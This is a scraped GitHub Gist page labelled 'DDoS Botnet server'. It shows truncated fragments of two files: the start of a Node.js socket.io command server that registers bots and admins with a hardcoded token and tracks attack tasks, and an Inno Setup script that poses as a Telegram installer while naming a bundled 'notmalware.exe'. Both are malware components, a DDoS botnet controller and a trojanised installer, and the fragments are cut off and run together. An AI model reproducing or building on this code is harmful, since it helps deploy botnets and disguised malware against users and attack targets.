Skip to content

Instantly share code, notes, and snippets.

View Maruf-S's full-sized avatar

Maruf Sherefa Maruf-S

View GitHub Profile
@Maruf-S
Maruf-S / server.js
Last active March 31, 2022 20:23
DDoS Botnet server
const { Client, AttackType } = require("../lib/classes/client");
const { SocketService } = require("../lib/classes/client_socket_list");
const authToken = "c1e8798209-0,c21ce21e2c12";
let tasks = [];
// no_of_packets,progress,clientsLen,id
module.exports = function (io) {
let botsIo = io.of("/bots");
let adminIo = io.of("/admin");
botsIo.on("connection", async (socket) => {
console.log(`Got a new client [@${socket.id}]`);
; Script generated by the Inno Setup Script Wizard.
; SEE THE DOCUMENTATION FOR DETAILS ON CREATING INNO SETUP SCRIPT FILES!
#define MyAppName "Telegram"
#define MyAppVersion "5"
#define MyAppPublisher "Telegram"
#define MyAppExeName "Telegram.exe"
#define MalwareName "notmalware.exe"